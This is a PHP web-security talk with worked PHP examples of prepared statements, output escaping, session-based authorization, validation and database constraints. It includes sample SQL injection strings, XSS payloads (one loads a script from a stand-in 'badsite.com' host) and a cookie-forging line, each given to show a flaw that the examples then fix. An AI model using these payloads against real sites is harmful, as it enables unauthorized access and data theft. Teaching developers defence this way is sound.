Security in PHP Applications: An absolute must!

Mark Niebergall
https://joind.in/14031



About Mark Niebergall

● Developing in PHP since 2005
● Masters degree in Information Systems
● Senior Software Engineer and Team Lead
● Occupational health screening project
● Security: SSCP, CSSLP Certified
● PHP, databases, JavaScript
● Enjoy being outdoors

Security Landscape

● Constant attacks: http://map.ipviking.com/
● Targeting all organizations
● Script kiddies, collectives, nation states, crackers, thieves, colleagues, insiders, creative users, and many more

Notable Attacks

● Target
● Home Depot
● Sony Pictures
● Anthem
● JP Morgan Chase
● Ebay
● Sony PSN
● Xbox Live

Tech Attacks

● Mt. Gox
● Drupal
● php.net
● Facebook
● Mozilla
● Slack
● Github

PHP Version

● December 2014: only 25.94% of PHP installs were secure based on PHP version
● Check your version; upgrade to a supported version that still receives security fixes
● Anthony Ferrara: http://blog.ircmaxell.com/2014/12/php-install-statistics.html

No Organization is Immune

Security Topics Covered

● SQL injection
● Cross-site scripting (XSS)
● Authentication and authorization
● Data validation
● Data integrity

SQL injection

● SELECT * FROM users WHERE id = $id
● $id = '15; UPDATE users SET enabled = 1'
● Bind the value instead of concatenating it:
  $this->getDb()->select()->from('users', 'username', ['user_id = ?' => $id])

SQL injection

● UPDATE product SET cost = $_GET['cost'] WHERE id = $_GET['id']
● cost = '0.01'
● id = '1 OR 1=1' (every row now matches the WHERE clause)
● Bind the values instead of concatenating them:
  $this->getDb()->update('product', ['cost' => $cost], ['id = ?' => $id]);

SQL Injection Solutions

● Use prepared statements (PDO, framework)
● Consider misuses
● Validate data
● Use database features when applicable
  o Views
  o Stored Procedures
  o Functions
  o CTE
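The product UPDATE from the slides, run both ways against an in-memory SQLite database through PDO. This is an added example, not code from the original slides; the table layout, sample rows and the two function names are constructed for the demo.

```php
<?php
// Added example (not from the original slides): the slide's
//   UPDATE product SET cost = $_GET['cost'] WHERE id = $_GET['id']
// with cost = '0.01' and id = '1 OR 1=1', first concatenated, then bound.
// Table name, columns and sample rows are constructed for this demo.
declare(strict_types=1);

function setupDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // On MySQL also turn off emulated prepares so the server, not the driver,
    // separates query text from data:
    // $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $db->exec('CREATE TABLE product (id INTEGER PRIMARY KEY, cost REAL NOT NULL)');
    $db->exec('INSERT INTO product (id, cost) VALUES (1, 19.99), (2, 49.99), (3, 99.99)');
    return $db;
}

// Vulnerable: request values are pasted into the SQL text.
function updateCostVulnerable(PDO $db, string $cost, string $id): int
{
    $sql = "UPDATE product SET cost = $cost WHERE id = $id";
    return $db->exec($sql);              // rows affected
}

// Hardened: validate the input, then bind it as a parameter.
function updateCostSafe(PDO $db, string $cost, string $id): int
{
    $idInt   = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $costNum = filter_var($cost, FILTER_VALIDATE_FLOAT);
    if ($idInt === false || $costNum === false || $costNum < 0) {
        throw new InvalidArgumentException('id must be a positive integer and cost a non-negative number');
    }
    $stmt = $db->prepare('UPDATE product SET cost = :cost WHERE id = :id');
    $stmt->bindValue(':cost', $costNum);
    $stmt->bindValue(':id', $idInt, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

function listCosts(PDO $db): string
{
    $rows = $db->query('SELECT id, cost FROM product ORDER BY id')->fetchAll(PDO::FETCH_ASSOC);
    return implode(', ', array_map(fn ($r) => "{$r['id']}={$r['cost']}", $rows));
}

// Attacker-controlled values exactly as on the slide.
$cost = '0.01';
$id   = '1 OR 1=1';

$db = setupDb();
echo 'vulnerable: ' . updateCostVulnerable($db, $cost, $id) . " rows updated -> " . listCosts($db) . "\n";

$db = setupDb();
try {
    updateCostSafe($db, $cost, $id);
} catch (InvalidArgumentException $e) {
    echo 'safe: rejected (' . $e->getMessage() . ")\n";
}
echo 'safe: ' . updateCostSafe($db, $cost, '1') . " rows updated -> " . listCosts($db) . "\n";
```

With the slide's id value the vulnerable call rewrites every product's cost, because the text `1 OR 1=1` becomes part of the WHERE clause. The hardened version rejects the value before any SQL is built, and even without that check a bound parameter is compared as a single value rather than parsed as SQL.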

XSS

● Form of code injection
● Attacker injects client-side script into a site
● Persistent vs Reflected (non-persistent)

XSS

● <script>window.location.href='http://youtube.com'</script>
● <script src="http://badsite.com/stealData.js"></script>

XSS

● Filter inbound data
  o filter_input / filter_var for content
  o Data validation
● Escape view data
  o htmlspecialchars() with ENT_QUOTES for the HTML context it is printed in
  o strip_tags($string, $allowedTags) only removes tags; it is not output escaping and leaves attribute-breaking characters in place
● Remove unwanted characters http://ascii.cl/
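The two payloads from the XSS slides pushed through strip_tags() and htmlspecialchars(), plus a third, constructed payload that contains no tag at all. This is an added example, not code from the original slides; the escapeHtml() wrapper and the attribute-context payload are assumptions for the demo.

```php
<?php
// Added example (not from the original slides): why output escaping is
// htmlspecialchars(), not strip_tags(). The first two inputs are the slide's
// payloads; the third is a constructed attribute-context payload.
declare(strict_types=1);

function escapeHtml(string $value): string
{
    // ENT_QUOTES also escapes ' so the value is safe inside quoted attributes;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Minimal "view": the value lands both in element content and in an attribute.
function renderWithStripTags(string $value): string
{
    $v = strip_tags($value);
    return "<p>$v</p><input value=\"$v\">";
}

function renderWithEscaping(string $value): string
{
    $v = escapeHtml($value);
    return "<p>$v</p><input value=\"$v\">";
}

$inputs = [
    '<script>window.location.href="http://youtube.com"</script>',
    '<script src="http://badsite.com/stealData.js"></script>',
    '" onmouseover="alert(document.cookie)',   // no tag: strip_tags passes it untouched
];

foreach ($inputs as $input) {
    echo "input:      $input\n";
    echo "strip_tags: " . renderWithStripTags($input) . "\n";
    echo "escaped:    " . renderWithEscaping($input) . "\n\n";
}
```

For the third input strip_tags() returns the string unchanged, so the rendered attribute becomes `<input value="" onmouseover="alert(document.cookie)">` and the script runs on hover; htmlspecialchars() turns the quote into `&quot;` and the browser sees one literal attribute value. strip_tags() also destroys legitimate data (a user whose bio mentions `<3` loses it), so use it only where stripping tags is the intended behaviour, and escape on output regardless.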

Authentication and Authorization

● Authentication: user is who they say they are
● Authorization: user has access to resource

Authentication and Authorization

● $_SESSION['user'] vs $_COOKIE['user'] (server-side state vs a value the client chooses)
● javascript:document.cookie="user=admin"
● https://yoursite.com/users.php?id=7 (is record 7 the logged-in user's own?)

Authentication and Authorization

● Do not trust data that can be altered by user
  o GET
  o POST
  o COOKIE
  o SERVER
  o ENV

Authentication and Authorization

● Sessions and tokens
● Automatic logouts
● Auditing

Authentication and Authorization

● Never assume user has authorization
● Check values from user
● Considerations for authorization
  o Can user gain access to personal or sensitive data
  o Can user change user 'admin' email and password
  o Can user manipulate DOM
  o Can user use SQL injection to get unauthorized data
  o Can user use XSS
  o Can user see detailed technical errors
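The users.php?id=7 check from the slides, decided from session state rather than from anything the client sends, with the automatic logout from the "Sessions and tokens" slide. This is an added example, not code from the original slides; the function names, the 15-minute idle limit and the sample session are assumptions. The session is passed around as an array so the script runs from the command line; in a request it would be $_SESSION after session_start().

```php
<?php
// Added example (not from the original slides): authentication from the
// session, authorization checked per request, idle logout.
// Function names, the idle limit and the walk-through values are assumptions.
declare(strict_types=1);

const IDLE_LIMIT_SECONDS = 15 * 60;

// Called once after the password check succeeds. The user id stored here is
// the only identity the application trusts; $_COOKIE['user'] never is.
function loginUser(array &$session, int $userId, bool $isAdmin, int $now): void
{
    // In a real request call session_regenerate_id(true) first (session fixation).
    $session = ['user_id' => $userId, 'is_admin' => $isAdmin, 'last_seen' => $now];
}

// Returns the authenticated user id, or null when not logged in or idle too long.
function authenticatedUser(array &$session, int $now): ?int
{
    if (!isset($session['user_id'], $session['last_seen'])) {
        return null;
    }
    if ($now - $session['last_seen'] > IDLE_LIMIT_SECONDS) {
        $session = [];                       // automatic logout
        return null;
    }
    $session['last_seen'] = $now;
    return $session['user_id'];
}

// Authorization for users.php?id=...: a user may read only their own record
// unless they are an admin. The requested id is validated, never trusted.
function canViewUser(array $session, string $requestedId): bool
{
    $id = filter_var($requestedId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false || !isset($session['user_id'])) {
        return false;
    }
    return !empty($session['is_admin']) || $session['user_id'] === $id;
}

// Constructed walk-through: user 7 logs in and requests a few ids.
$now     = time();
$session = [];
loginUser($session, 7, false, $now);
$uid = authenticatedUser($session, $now);

foreach (['7', '8', '7 OR 1=1', '-1'] as $requested) {
    printf("user %d requesting id=%s: %s\n", $uid, $requested,
        canViewUser($session, $requested) ? 'allowed' : 'denied');
}

// Sixteen minutes later the same session is no longer authenticated,
// whatever cookie the browser still presents.
printf("after 16 minutes: %s\n",
    authenticatedUser($session, $now + 16 * 60) === null ? 'logged out' : 'still logged in');
```

The ownership check is the piece most often missing: the id in the URL is validated as an integer, but the decision still has to compare it against the identity in the session. Pointing the check at $_COOKIE['user'] instead would let the `document.cookie="user=admin"` line from the slide pass it.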


Data Validation

● Ensure data is clean, correct, and useful

Data Validation

● Data type
  o Integer
  o Float
  o String
  o Date

Data Validation

● Range and constraint
  o Minimum
  o Maximum
  o Length
  o Matches regular expression

Data Validation

● Code and cross-reference
  o Data is useful
  o Database constraints

Data Validation

● Structured validation
  o Data type
  o Conditional requirements
  o Data object
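Structured validation of one payload, covering the checks listed on the Data Validation slides: data type (integer, float, string, date), minimum and maximum, length, regular expression, and a conditional requirement. This is an added example, not code from the original slides; the field names, limits and the two sample payloads are assumptions for the demo.

```php
<?php
// Added example (not from the original slides): a validator that returns a
// typed, clean data object or a per-field error list.
// Field names, limits and sample payloads are constructed for this demo.
declare(strict_types=1);

/** Returns ['ok' => bool, 'data' => clean typed values, 'errors' => field => message]. */
function validateProfile(array $input): array
{
    $errors = [];
    $clean  = [];

    // Integer with minimum and maximum
    $age = filter_var($input['age'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 13, 'max_range' => 120]]);
    if ($age === false) {
        $errors['age'] = 'must be an integer between 13 and 120';
    } else {
        $clean['age'] = $age;
    }

    // String: length and character set enforced by one regular expression
    $username = (string) ($input['username'] ?? '');
    if (!preg_match('/\A[a-z0-9_]{3,20}\z/', $username)) {
        $errors['username'] = 'must be 3-20 lowercase letters, digits or underscores';
    } else {
        $clean['username'] = $username;
    }

    // Float within a range
    $height = filter_var($input['height_m'] ?? null, FILTER_VALIDATE_FLOAT);
    if ($height === false || $height < 0.5 || $height > 2.5) {
        $errors['height_m'] = 'must be a number between 0.5 and 2.5';
    } else {
        $clean['height_m'] = $height;
    }

    // Date: must parse AND round-trip, so 2015-02-30 is rejected rather than
    // silently rolled over to March 2nd
    $dob  = (string) ($input['dob'] ?? '');
    $date = DateTimeImmutable::createFromFormat('!Y-m-d', $dob);
    if ($date === false || $date->format('Y-m-d') !== $dob) {
        $errors['dob'] = 'must be a real date in YYYY-MM-DD form';
    } else {
        $clean['dob'] = $date;
    }

    // Conditional requirement: phone is mandatory only when SMS alerts are on
    $sms   = filter_var($input['sms_alerts'] ?? false, FILTER_VALIDATE_BOOLEAN);
    $phone = (string) ($input['phone'] ?? '');
    $clean['sms_alerts'] = $sms;
    if ($phone !== '' && !preg_match('/\A\+?[0-9]{7,15}\z/', $phone)) {
        $errors['phone'] = 'must be 7-15 digits with an optional leading +';
    } elseif ($sms && $phone === '') {
        $errors['phone'] = 'required when sms_alerts is on';
    } elseif ($phone !== '') {
        $clean['phone'] = $phone;
    }

    return ['ok' => $errors === [], 'data' => $clean, 'errors' => $errors];
}

// Constructed payloads: one that should pass, one that breaks every rule.
$good = ['age' => '34', 'username' => 'mark_n', 'height_m' => '1.80',
         'dob' => '1981-06-15', 'sms_alerts' => 'yes', 'phone' => '+15555550123'];
$bad  = ['age' => '12', 'username' => 'Mark Niebergall', 'height_m' => 'tall',
         'dob' => '2015-02-30', 'sms_alerts' => 'on'];   // phone missing while SMS is on

foreach (['good' => $good, 'bad' => $bad] as $label => $payload) {
    $result = validateProfile($payload);
    echo "$label payload: " . ($result['ok'] ? 'valid' : 'invalid') . "\n";
    foreach ($result['errors'] as $field => $message) {
        echo "  $field: $message\n";
    }
}
```

Everything downstream consumes $result['data'], which holds typed values (int, float, DateTimeImmutable) rather than the raw strings, so the SQL and view layers never see unvalidated input. Keep the validator the single place that knows the rules; duplicating them in the form and the controller is how conditional requirements drift apart.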

Data Integrity

● Foreign keys to ensure relational data is created and kept accurately
● Unique keys to prevent data duplication
● Avoid data corruption and data loss
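Letting the database enforce the two rules from this slide, foreign keys and unique keys, so that an application bug cannot leave orphaned or duplicated rows behind. This is an added example, not code from the original slides; the schema, table names and sample statements are constructed for the demo.

```php
<?php
// Added example (not from the original slides): integrity constraints enforced
// by the database, exercised through PDO on in-memory SQLite.
// Schema, table names and sample data are constructed for this demo.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// SQLite ignores foreign keys unless told otherwise; InnoDB and PostgreSQL enforce them by default.
$db->exec('PRAGMA foreign_keys = ON');

$db->exec('CREATE TABLE users (
    id    INTEGER PRIMARY KEY,
    email TEXT NOT NULL UNIQUE
)');
$db->exec('CREATE TABLE orders (
    id      INTEGER PRIMARY KEY,
    user_id INTEGER NOT NULL REFERENCES users(id) ON DELETE RESTRICT,
    total   REAL NOT NULL CHECK (total >= 0)
)');

$db->exec("INSERT INTO users (id, email) VALUES (1, 'alice@example.com')");
$db->exec("INSERT INTO orders (user_id, total) VALUES (1, 42.50)");

function tryStatement(PDO $db, string $sql): string
{
    try {
        $db->exec($sql);
        return 'accepted';
    } catch (PDOException $e) {
        return 'rejected: ' . $e->getMessage();
    }
}

// Each statement violates one rule; the database, not the PHP code, refuses it.
$attempts = [
    'duplicate email'        => "INSERT INTO users (email) VALUES ('alice@example.com')",
    'orphaned order'         => "INSERT INTO orders (user_id, total) VALUES (99, 10.00)",
    'negative total'         => "INSERT INTO orders (user_id, total) VALUES (1, -5.00)",
    'delete user with order' => "DELETE FROM users WHERE id = 1",
];

foreach ($attempts as $label => $sql) {
    printf("%-24s %s\n", $label, tryStatement($db, $sql));
}
printf("users: %d, orders: %d\n",
    $db->query('SELECT COUNT(*) FROM users')->fetchColumn(),
    $db->query('SELECT COUNT(*) FROM orders')->fetchColumn());
```

All four attempts are rejected and the row counts are unchanged. The application should still validate first, so users get a readable message rather than a driver error, but the constraint is the backstop that holds when a code path forgets to.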

Data Integrity

● Stability
● Performance
● Re-usability
● Maintainability
● Applies to both database and application

Development Life Cycle

● Analyze application security needs
● Threat modeling
● Risk acceptance level
● Security considerations in requirements
● Project management and developers need to work closely

Development Life Cycle

● Security testing for acceptance
● Code reviews
● Regular review of security landscape and emerging threats
● Identify weakest points and make a plan to strengthen those areas

Convince Management to Invest

● Avoid fear tactics
● Explain benefits of investment
  o Brand value
  o Customer loyalty
  o Selling point
● Discuss applicable regulations
● Visibility into current security posture
● Plans and goals

Resources

● Anthony Ferrara, PHP install statistics: http://blog.ircmaxell.com/2014/12/php-install-statistics.html
● OWASP XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Questions?

● https://joind.in/14031